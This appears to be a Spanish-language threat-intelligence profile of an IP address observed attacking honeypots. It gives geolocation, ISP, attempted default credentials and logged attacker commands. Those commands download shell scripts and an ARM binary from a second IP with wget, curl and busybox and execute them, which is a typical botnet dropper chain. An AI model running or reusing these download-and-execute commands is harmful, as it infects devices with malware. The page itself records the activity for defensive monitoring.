Amenaza ActivaMEDIO

176.65.148.89

Pais de Origen🇳🇱 Paises Bajos
Primera Deteccion10/1/2026
Ultima Actividad16/1/2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
68
Ataques Totales
🔌
2
Puertos
📡
2
Tipos Ataque
🦠
1
Malware

Geolocalizacion

Pais
🇳🇱 Paises Bajos
Ciudad
Eygelshoven
ASN
AS51396
ISP
Pfcloud UG (haftungsbeschrankt)

Tipos de Ataque

adbhoney
cowrie

Puertos Atacados

555523

Malware Asociado

Credenciales Intentadas

🔐admin/admin
1x
🔐root/admin
1x

Comandos Ejecutados

$cd /data/local/tmp/; busybox wget http://82.221.139.173:3712/w.sh; sh w.sh; curl http://82.221.139.173:3712/c.sh; sh c.sh; wget http://82.221.139.173:3712/wget.sh; sh wget.sh; curl http://82.221.139.173:3712/wget.sh; sh wget.sh; busybox wget http://82.221.139.173:3712/wget.sh; sh wget.sh; busybox curl http://82.221.139.173:3712/wget.sh; sh wget.sh11x
$cd /data/local/tmp/; busybox wget http://82.221.139.173:49180/whale.sh; sh whale.sh; curl http://82.221.139.173:49180/car.sh; sh car.sh; wget http://82.221.139.173:49180/wgain.sh; sh wgain.sh; curl http://82.221.139.173:49180/wgain.sh; sh wgain.sh; busybox wget http://82.221.139.173:49180/wgain.sh; sh wgain.sh; busybox curl http://82.221.139.173:49180/wgain.sh; sh wgain.sh9x
$cd /tmp;rm -rf RANGER1x
$wget http://82.221.139.173:3712/bins/systemx64.arm;chmod 777 systemx64.arm;./systemx64.arm TELNETarm1x

Evaluacion de Riesgo

52
/100
BajoMedioAltoCritico